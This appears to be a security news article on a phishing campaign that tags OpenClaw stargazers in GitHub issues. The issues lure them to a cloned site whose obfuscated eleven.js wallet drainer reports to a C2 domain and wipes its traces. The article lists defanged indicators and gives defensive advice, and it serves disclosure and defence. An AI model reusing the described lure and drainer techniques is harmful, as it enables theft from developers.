The OpenClaw GitHub Phishing Attack: How Scammers Turned 323,000 Stars Into a Target List

When OpenAI CEO Sam Altman publicly announced that OpenClaw creator Peter Steinberger would lead the company's push into personal AI agents, it was exactly the kind of high-profile moment that draws unwanted attention. The AI agent framework, which had already amassed 323,000 GitHub stars following its acquisition by OpenAI, found itself in a different set of crosshairs almost immediately: not security researchers, but crypto scammers with a precisely constructed phishing operation ready to deploy.

Tel Aviv-based cybersecurity firm OX Security published its findings on Wednesday, March 19, 2026, detailing an active campaign that uses GitHub's own notification infrastructure against the developers it is supposed to serve. The attack is not technically sophisticated in the traditional sense. There are no zero-days, no CVE exploits, no compromised supply chains. What it is, instead, is a tightly assembled sequence of social engineering steps that weaponizes trust — trust in GitHub notifications, trust in the OpenClaw brand, and trust that a message personalized to your contribution history must be legitimate.

Background: Why OpenClaw Became a Target

OpenClaw launched in November 2025 as a free, open-source autonomous AI agent that runs locally on a user's machine. Unlike chat-based AI tools that respond only when prompted, OpenClaw agents persist, wake on a schedule, store memory locally, and execute multi-step tasks autonomously — connecting to messaging apps, email accounts, calendars, and shell commands. That capability profile made it explosive in developer communities almost immediately.

OX Security had previously flagged the project — then operating under the name MoltBot before a rebrand — as a significant security concern for entirely different reasons. In a January 2026 report, the firm noted that the tool, at the time, stored credentials, API keys, and environment variables in cleartext. With 300-plus contributors and hundreds of thousands of users, the researchers warned that a single malicious commit or compromised developer account could introduce a backdoor affecting an enormous user base. That broader supply chain risk remains a separate concern from the phishing campaign described here.

The crypto opportunism that followed OpenClaw's rise was relentless from the start. Steinberger told Decrypt that spam was flooding the project's Discord "every half hour," eventually forcing a blanket ban on all coin-related discussion. That ban followed an incident in January 2026 in which scammers hijacked OpenClaw's old accounts to promote a Solana-based token called $CLAWD, which briefly surged to a market cap of approximately $16 million before collapsing more than 90% after Steinberger publicly denied any involvement. At that point, Steinberger issued an explicit, public statement on X: "I will never do a coin. Any project that lists me as coin owner is a scam."

"We would never do that. The project is open source and non-commercial." — Peter Steinberger, OpenClaw creator, responding to the March 2026 phishing campaign

None of that deterred the threat actors behind the current campaign. If anything, OpenClaw's continued growth — and its now-official association with OpenAI — made its developer community a more valuable target, not less.

How the Attack Is Structured

The campaign follows a four-stage sequence: target identification, delivery via GitHub, lure site, and wallet drain. Each stage is designed to look plausible to a developer who is not actively on guard against it.

Stage 1: Building the Target List from GitHub Stars

OX Security assesses that the attackers used GitHub's public star feature to enumerate users who had starred OpenClaw-related repositories. GitHub stars are publicly visible by default, meaning any account can query who has starred a given repository without any special access or credential. This turned what could have been a generic mass-phishing blast into something that felt personal: a message about a project the recipient had already actively engaged with.

Moshe Siman Tov Bustan, research team lead at OX Security and co-author of the report, confirmed to Decrypt that the campaign appeared to target specifically those users who had starred the OpenClaw GitHub repository. This precision targeting is what makes the lure convincing on first read. A message referencing a project you care about, arriving through a platform you trust, from an account that appears to be discussing that project, carries far more social weight than an unsolicited cold email.

Stage 2: The GitHub Delivery Mechanism

The delivery method is an abuse of GitHub's issue notification system. The threat actors created throwaway GitHub accounts — created the week of the campaign's launch and deleted within hours of execution — then opened issue threads in attacker-controlled repositories. Within those threads, they tagged the targeted developers by username.

GitHub sends email notifications when a user is tagged in an issue. That notification arrives in an inbox with GitHub's own branding and domain, lending it a degree of implicit legitimacy. The message in the issue thread told developers: "Appreciate your contributions on GitHub. We analyzed profiles and chose developers to get OpenClaw allocation." It then claimed the recipient had won $5,000 worth of $CLAW tokens and directed them to a link to collect the reward.

The link used in at least one observed instance was routed through a Google link-sharing redirect — linkshare[.]google/LnvVOHW6pravJMSu7 — before delivering the user to the actual phishing domain. Using a Google-branded redirect adds one more layer of apparent legitimacy and can cause some URL-scanning tools to miss the final destination.

Stage 3: The Cloned Website

The redirect lands the victim at token-claw[.]xyz, a near-pixel-perfect clone of the official openclaw.ai website. The visual similarity is deliberate and precise: someone who has visited the real OpenClaw site before will see what appears to be familiar interface elements and branding. The critical addition is a single button that does not exist on the legitimate site: "Connect your wallet."

The phishing page supports a wide range of cryptocurrency wallets to maximize the pool of potential victims. OX Security identified compatibility with MetaMask, Trust Wallet, WalletConnect, OKX Wallet, and Bybit Wallet. Covering five of the largest wallet platforms ensures that nearly any developer who holds crypto assets has a compatible wallet that will respond to the connection prompt.

Stage 4: The Wallet Drainer — eleven.js

The wallet-stealing logic is embedded inside a heavily obfuscated JavaScript file named eleven.js. Obfuscation — the deliberate transformation of readable code into a form that is functionally identical but nearly impossible to read — is a standard technique used to slow down analysis by security researchers and automated scanners. Common patterns include eval() calls, atob() base64 decoding, String.fromCharCode() character construction, and hex-encoded strings.

OX Security researchers deobfuscated the file as part of their analysis. What they found inside was a fully functional wallet drain operation with a command structure designed to track user interactions in real time and relay encoded data back to a separate command-and-control server.

The malware uses the domain watery-compost[.]today as its C2 server — the remote infrastructure that collects stolen data and enables the attacker to monitor victim interactions as they happen. The encoded payload sent to the C2 server includes wallet addresses, transaction values, and account names. The malware's built-in command vocabulary includes:

• PromtTx — triggers when the wallet connection prompt is displayed
• Approved — fires when the user approves a transaction or wallet connection
• Declined — fires when the user rejects the prompt

This command structure gives the attacker a real-time view of victim behavior, allowing them to track how far each target progresses through the wallet-connection flow.

The Nuke Function: Designed to Erase Evidence

One of the more deliberate aspects of the malware is a built-in self-cleanup function that OX Security's researchers named "nuke." Once the wallet drain operation is complete, this function wipes all wallet-stealing data from the browser's local storage. The purpose is forensic obstruction: if a victim later tries to investigate what happened by examining their browser's stored data, the evidence will already be gone. This signals that the people behind the campaign thought carefully about post-incident detection, not just initial delivery.

Attacker Infrastructure and Attribution Indicators

OX Security researchers identified one cryptocurrency wallet address they assess belongs to the threat actor: 0x6981E9EA7023a8407E4B08ad97f186A5CBDaFCf5. This address is presumed to be the destination for any funds successfully drained from victim wallets. As of the time of OX Security's report, the address had not sent or received any funds, suggesting either that the campaign had not yet produced confirmed victims or that funds were being routed through an intermediary not yet identified.

Bustan told Decrypt that the campaign bears resemblance to a previous phishing operation that targeted Solana users on GitHub, though the relationship between the two campaigns was still under analysis at the time of publication. "We're still analyzing the behavior and the relation of these campaigns," he said.

The operational timeline for the fake accounts is telling. They were created the week of the campaign launch and deleted within hours of deploying the phishing messages. This hit-and-run account lifecycle is a deliberate evasion tactic: it compresses the window during which GitHub's abuse detection systems can flag the accounts, and it leaves almost no persistent infrastructure for researchers to trace after the fact. The accounts themselves are disposable; the malware infrastructure hosted at the C2 domain is where the actual operational persistence lives.

The Hacker News community discussion on this campaign noted the suspicious speed of account creation and deletion as one of the clearest red flags, alongside the novelty of the accounts and the implausibility of a legitimate project distributing tokens through GitHub issue threads from unknown accounts.

The Broader Pattern: Open Source Meets Crypto Opportunism

This campaign is not an isolated incident. It represents a pattern that security practitioners have been watching develop for several years: threat actors identify high-visibility open source projects, wait for a moment of peak attention, and then deploy social engineering infrastructure that rides the project's credibility. The targeting of GitHub's star feature as a prospecting tool is a refinement of this approach — it allows attackers to identify not just users of a project but users who have publicly signaled active interest in it.

The intersection of developer communities and cryptocurrency is particularly fertile ground for this attack type. Developers are statistically more likely to hold crypto assets than the general population. They are also accustomed to receiving legitimate notifications from GitHub about projects they follow, making the delivery vector feel normal. And the promise of a free token allocation — framed as a reward for contributions the recipient has actually made — is precisely calibrated to feel plausible rather than random.

OpenClaw's transition to a foundation-run open-source model, as noted by security researchers covering the campaign, means its contributor base will continue to grow. More stars, more visible contributors, more data points for attackers to use in building targeted lists. The surface area for this kind of attack expands with the project's success.

OX Security's Bustan summarized the fundamental vulnerability exposed by this campaign: the attack targeted users who had starred the OpenClaw GitHub repository, making the phishing attempt appear more targeted and credible. That precision is the point. A developer who receives a message referencing a project they actively follow, through a channel they legitimately use, is being given every social signal that the message is real. The technical sophistication of the payload is almost secondary to that social engineering foundation.

"During our analysis, we found only one address belonging to the threat actor, which hadn't sent or received any funds yet." — Moshe Siman Tov Bustan, research team lead, OX Security

What Developers Need to Do Right Now

OX Security's recommendations, combined with additional guidance from the security community's response to this campaign, break down into immediate actions and longer-term operational practices.

Immediate actions if you may have been affected: If you received a GitHub notification referencing an OpenClaw token allocation and visited any linked site, treat it as a compromise. Revoke all wallet approvals associated with that session using your wallet's built-in permissions manager or a third-party revocation tool. Do not wait to confirm whether funds have moved; revoke first.

If you connected a MetaMask, Trust Wallet, WalletConnect, OKX Wallet, or Bybit Wallet to any site offering CLAW tokens, check your wallet's transaction history for any approvals you do not recognize. An approval transaction — distinct from a transfer — grants a smart contract permission to move funds on your behalf. These approvals persist until explicitly revoked.

Infrastructure-level blocks: Block token-claw[.]xyz and watery-compost[.]today at the DNS or firewall level across your environment. These are the two known attacker-controlled domains identified in OX Security's analysis.

Operational hygiene going forward:

• Never connect a primary holding wallet to any site reached through a link in a GitHub issue, email notification, or social media message. Type official domains directly into the browser address bar.
• Treat any GitHub issue promoting a token giveaway, airdrop, or allocation as suspicious by default, especially if the account posting it was created recently or has minimal history.
• Verify the age and activity history of any GitHub account before engaging with its content. Throwaway accounts created days before a campaign launch are a reliable signal of malicious intent.
• Use a dedicated wallet with minimal funds for any legitimate airdrop or dApp interaction. Never expose a cold storage or primary holdings wallet to a web-based connection prompt.
• Consider auditing your GitHub profile's public visibility settings. Public starring behavior is one data point attackers are actively exploiting for targeting.

Key Takeaways

1. The attack vector is GitHub notifications, not email spam: Delivery through GitHub's own tagging and notification system lends false legitimacy. Standard spam filters will not catch it. Developer awareness is the primary defense at this stage.
2. eleven.js is a purpose-built wallet drainer with forensic countermeasures: The "nuke" function is not an afterthought — it signals a campaign designed with post-incident detection in mind. If you connected a wallet to this site, standard browser-based forensics may no longer show you what happened.
3. The attacker's wallet address is known but has not yet transacted: 0x6981E9EA7023a8407E4B08ad97f186A5CBDaFCf5 is on record with researchers. Monitoring this address for activity provides one signal of whether the campaign successfully drained any wallets after OX Security's public disclosure.
4. The $CLAW token does not exist: OpenClaw has no cryptocurrency component. Steinberger's January 2026 statement on X remains operative: any project or token claiming his involvement is a scam.
5. Block both malicious domains immediately: token-claw[.]xyz and watery-compost[.]today should be blocked at the DNS or firewall level across any environment whose users may include GitHub developers.

As of OX Security's disclosure on March 19, 2026, no confirmed victim losses have been publicly reported. The campaign's infrastructure, however, is fully operational. The absence of confirmed victims at time of reporting reflects either the effectiveness of community awareness — social media reports suggest many developers identified the campaign as fraudulent almost immediately — or the early stage of the operation's execution window before researchers disrupted it through public disclosure. Either way, the threat is live and the domains remain active.